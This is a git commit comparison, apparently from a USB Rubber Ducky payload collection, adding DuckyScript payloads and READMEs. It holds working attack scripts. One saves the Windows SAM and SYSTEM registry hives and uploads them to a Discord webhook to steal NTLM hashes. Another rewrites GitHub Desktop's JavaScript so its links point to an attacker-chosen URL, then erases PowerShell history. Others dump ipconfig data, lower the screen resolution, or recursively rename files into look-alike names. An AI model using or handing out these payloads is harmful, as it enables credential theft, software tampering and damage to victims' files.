Compare commits
27 Commits
cf0c83d37c
...
420a174f93
Author | SHA1 | Date |
---|---|---|
Mavis Coffey | 420a174f93 | |
Mavis Coffey | c8c6a75d33 | |
Mavis Coffey | 4e89426355 | |
Mavis Coffey | 566683c428 | |
Mavis Coffey | 5ed41467e3 | |
Mavis Coffey | a74d21e848 | |
Mavis Coffey | 0f85a6936e | |
Mavis Coffey | d9baab6395 | |
Peaks | 675972662a | |
Luu | 0df3011601 | |
Luu | a81ecd3e64 | |
Luu | c898ed7858 | |
Luu | 15f8f25701 | |
Peaks | adb9af43f8 | |
Aleff | 3cf199170c | |
Peaks | fd272a60f4 | |
Aleff | 9f1222ba05 | |
Aleff | d934d9d4de | |
Aleff | f031b928a8 | |
Aleff | bb89731ae2 | |
Aleff | 9c4257edbd | |
Aleff | d3e494fd12 | |
Alessandro Greco | b1fae99ade | |
Alessandro Greco | 52c42dfc10 | |
Alessandro Greco | 6e3f5924c0 | |
Aleff | 71d5eaf378 | |
Alessandro Greco | 1fa6cea874 |
|
@ -0,0 +1,12 @@
|
||||||
|
# IP-OUT
|
||||||
|
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
## Useful Tips
|
||||||
|
|
||||||
|
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||||
|
|
||||||
|
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
|
@ -2,20 +2,62 @@ REM Title: IP-Out
|
||||||
REM Author: Mavisinator30001
|
REM Author: Mavisinator30001
|
||||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||||
REM Target: Any Windows System
|
REM Target: Any Windows System
|
||||||
REM DISCLAIMER!!! Neither I, nor Hack5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||||
|
DEFINE #DRIVELABEL D
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
ATTACKMODE HID STORAGE
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 500
|
DELAY 500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 300
|
DELAY 300
|
||||||
STRING Powershell
|
STRINGLN Powershell
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
STRING ipconfig | Out-File -Filepath D:\exfil.txt -Encoding utf8
|
STRINGLN ipconfig | Out-File -Filepath #DRIVELABEL:\exfil.txt -Encoding utf8
|
||||||
ENTER
|
|
||||||
WAIT_FOR_STORAGE_ACTIVITY
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
WAIT_FOR_STORAGE_INACTIVITY
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
ALT F4
|
ALT F4
|
||||||
ATTACKMODE OFF
|
ATTACKMODE OFF
|
||||||
REM And should the attacker want to make sure the payload was successful:
|
HIDE_PAYLOAD
|
||||||
WAIT_FOR_BUTTON_PRESS
|
|
||||||
ATTACKMODE STORAGE
|
|
||||||
|
|
|
@ -0,0 +1,69 @@
|
||||||
|
# Replace Links In GithubDesktop
|
||||||
|
|
||||||
|
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
|
||||||
|
|
||||||
|
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Features](#features)
|
||||||
|
- [Prerequisites](#prerequisites)
|
||||||
|
- [Usage](#usage)
|
||||||
|
- [Credits](#credits)
|
||||||
|
|
||||||
|
## Features
|
||||||
|
|
||||||
|
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
|
||||||
|
|
||||||
|
1. Detects the installation folder of GitHub Desktop.
|
||||||
|
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
|
||||||
|
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
|
||||||
|
|
||||||
|
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
|
||||||
|
|
||||||
|
## Prerequisites
|
||||||
|
|
||||||
|
- **Windows 10/11**
|
||||||
|
- **GitHub Desktop** installed on the machine.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
1. **Modify the script**:
|
||||||
|
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
|
||||||
|
```duckyscript
|
||||||
|
DEFINE #NEW_LINK example.com
|
||||||
|
```
|
||||||
|
|
||||||
|
2. **Customization**:
|
||||||
|
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
|
||||||
|
```ducky
|
||||||
|
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||||
|
```
|
||||||
|
|
||||||
|
3. **Execution**:
|
||||||
|
- Upon execution, the script will:
|
||||||
|
- Open PowerShell.
|
||||||
|
- Detect the GitHub Desktop installation directory.
|
||||||
|
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,109 @@
|
||||||
|
REM_BLOCK
|
||||||
|
#####################################################
|
||||||
|
# #
|
||||||
|
# Title : Replace Links In GithubDesktop #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Execution #
|
||||||
|
# Target : Windows 10/11 #
|
||||||
|
# #
|
||||||
|
#####################################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
|
||||||
|
REM REQUIRED - Define here the new url that will replace the original github link
|
||||||
|
DEFINE #NEW_LINK example.com
|
||||||
|
|
||||||
|
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
|
||||||
|
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||||
|
|
||||||
|
|
||||||
|
REM_BLOCK
|
||||||
|
Credits: Hak5 LLC
|
||||||
|
Website: https://hak5.org/
|
||||||
|
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN PowerShell
|
||||||
|
DELAY 1000
|
||||||
|
|
||||||
|
STRINGLN_POWERSHELL
|
||||||
|
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
|
||||||
|
|
||||||
|
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
|
||||||
|
|
||||||
|
$versions = $folders | ForEach-Object {
|
||||||
|
[PSCustomObject]@{
|
||||||
|
FolderName = $_.Name
|
||||||
|
Version = [version]($_.Name -replace "app-", "")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
|
||||||
|
|
||||||
|
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
|
||||||
|
$latestFolderPath += "\resources\app\"
|
||||||
|
$renderer = "renderer.js"
|
||||||
|
$main = "main.js"
|
||||||
|
|
||||||
|
$filePath = "$latestFolderPath$renderer"
|
||||||
|
|
||||||
|
$fileContent = Get-Content $filePath
|
||||||
|
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
|
||||||
|
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
|
||||||
|
Set-Content -Path $filePath -Value $modifiedContent
|
||||||
|
|
||||||
|
|
||||||
|
$filePath = "$latestFolderPath$main"
|
||||||
|
$fileContent = Get-Content $filePath
|
||||||
|
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
|
||||||
|
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
|
||||||
|
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||||
|
|
||||||
|
END_STRINGLN
|
|
@ -0,0 +1,28 @@
|
||||||
|
# Exfiltrate NTLM Hash - Windows ✅
|
||||||
|
|
||||||
|
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the Discord webhook URL
|
||||||
|
* Ensure the webhook permissions are configured
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,34 @@
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||||
|
GUI d
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 3000
|
||||||
|
LEFTARROW
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||||
|
DELAY 500
|
||||||
|
GUI d
|
|
@ -0,0 +1,5 @@
|
||||||
|
# Resolution Prank
|
||||||
|
|
||||||
|
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||||
|
|
||||||
|
### Somewhat resource dependent, may not work on older computers
|
|
@ -1,15 +1,59 @@
|
||||||
REM TITLE Resolution Prank
|
REM TITLE Resolution Prank
|
||||||
REM AUTHOR Mavisinator30001
|
REM AUTHOR Mavisinator30001
|
||||||
REM TARGET Any system running Windows 10/11
|
REM TARGET Any system running Windows 10/11
|
||||||
REM DESCRIPTION Go into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
IF $_OS != WINDOWS
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
||||||
LED_G
|
LED_G
|
||||||
DELAY 500
|
DELAY 500
|
||||||
CTRL GUI d
|
CTRL GUI d
|
||||||
DELAY 500
|
DELAY 500
|
||||||
GUI i
|
GUI i
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
STRING display
|
STRINGLN display
|
||||||
ENTER
|
|
||||||
DELAY 2500
|
DELAY 2500
|
||||||
TAB
|
TAB
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -0,0 +1,118 @@
|
||||||
|
# Same File Name Prank
|
||||||
|
|
||||||
|
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
|
||||||
|
|
||||||
|
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
|
||||||
|
|
||||||
|
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
|
||||||
|
|
||||||
|
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
|
||||||
|
|
||||||
|
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
|
||||||
|
|
||||||
|
> What it looks like instead if you turn on the extension view.
|
||||||
|
|
||||||
|
# Index
|
||||||
|
|
||||||
|
1. [Features](#features)
|
||||||
|
2. [Payload Structure](#payload-structure)
|
||||||
|
- [Conditional Target OS Execution](#conditional-target-os-execution)
|
||||||
|
- [PowerShell (Windows)](#powershell-windows)
|
||||||
|
- [Bash (GNU/Linux)](#bash-gnulinux)
|
||||||
|
3. [How to Use](#how-to-use)
|
||||||
|
4. [Why not MacOS?](#why-not-macos)
|
||||||
|
5. [Notes](#notes)
|
||||||
|
6. [Credits](#credits)
|
||||||
|
|
||||||
|
|
||||||
|
## Features
|
||||||
|
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||||
|
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
|
||||||
|
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
|
||||||
|
|
||||||
|
## Payload Structure
|
||||||
|
|
||||||
|
### Conditional Target OS Execution
|
||||||
|
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
|
||||||
|
- If the target system is **Windows**, the script will execute a PowerShell script.
|
||||||
|
- If the target system is **Linux**, it will execute a Bash script.
|
||||||
|
|
||||||
|
### PowerShell (Windows)
|
||||||
|
For **Windows** systems, the script:
|
||||||
|
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
|
||||||
|
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
|
||||||
|
|
||||||
|
### Bash (GNU/Linux)
|
||||||
|
For **GNU/Linux** systems, the script:
|
||||||
|
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
|
||||||
|
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
|
||||||
|
|
||||||
|
## How to Use
|
||||||
|
|
||||||
|
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
|
||||||
|
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
|
||||||
|
|
||||||
|
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
|
||||||
|
|
||||||
|
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
|
||||||
|
|
||||||
|
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
|
||||||
|
|
||||||
|
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
|
||||||
|
|
||||||
|
Of course, you have to make sure that this folder exists....
|
||||||
|
|
||||||
|
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
|
||||||
|
|
||||||
|
> How Windows response to the command `cd ./Desktop/Hello/World/`
|
||||||
|
|
||||||
|
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
|
||||||
|
|
||||||
|
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
|
||||||
|
|
||||||
|
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||||
|
|
||||||
|
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|
||||||
|
|
||||||
|
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||||
|
|
||||||
|
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|
||||||
|
|
||||||
|
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||||
|
|
||||||
|
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
|
||||||
|
|
||||||
|
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
|
||||||
|
|
||||||
|
## Why not MacOS?
|
||||||
|
|
||||||
|
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||||
|
|
||||||
|
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
|
||||||
|
|
||||||
|
## Notes
|
||||||
|
- Ensure that the specified directories exist on the target machine.
|
||||||
|
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
|
||||||
|
- Contributions to add support for macOS are welcome.
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Aleff :octocat: </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/aleff-github">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||||
|
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Linkedin
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,222 @@
|
||||||
|
REM_BLOCK
|
||||||
|
#############################################
|
||||||
|
# #
|
||||||
|
# Title : Same File Name Prank #
|
||||||
|
# Author : Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows 10/11; GNU/Linux #
|
||||||
|
# #
|
||||||
|
#############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
|
||||||
|
|
||||||
|
REM %%%%% DEFINE-SECTION %%%%%
|
||||||
|
REM_BLOCK
|
||||||
|
|
||||||
|
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
|
||||||
|
|
||||||
|
Of course, you have to make sure that this folder exists....
|
||||||
|
|
||||||
|
Payload Settings:
|
||||||
|
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
|
||||||
|
|
||||||
|
Consider the maximum length of file names on both Windows and GNU/Linux:
|
||||||
|
- Limit on file name length in bash [closed]
|
||||||
|
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
|
||||||
|
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|
||||||
|
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
|
||||||
|
|
||||||
|
END_REM
|
||||||
|
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
|
||||||
|
|
||||||
|
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
|
||||||
|
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
|
||||||
|
DEFINE #TARGET_WINDOWS TRUE
|
||||||
|
DEFINE #TARGET_GNU_LINUX FALSE
|
||||||
|
|
||||||
|
REM %%%%% PAYLOAD-SECTION %%%%%
|
||||||
|
|
||||||
|
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
|
||||||
|
REM %%%%% WINDOWS CODE %%%%%
|
||||||
|
|
||||||
|
REM_BLOCK
|
||||||
|
Credits: Hak5 LLC
|
||||||
|
Website: https://hak5.org/
|
||||||
|
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
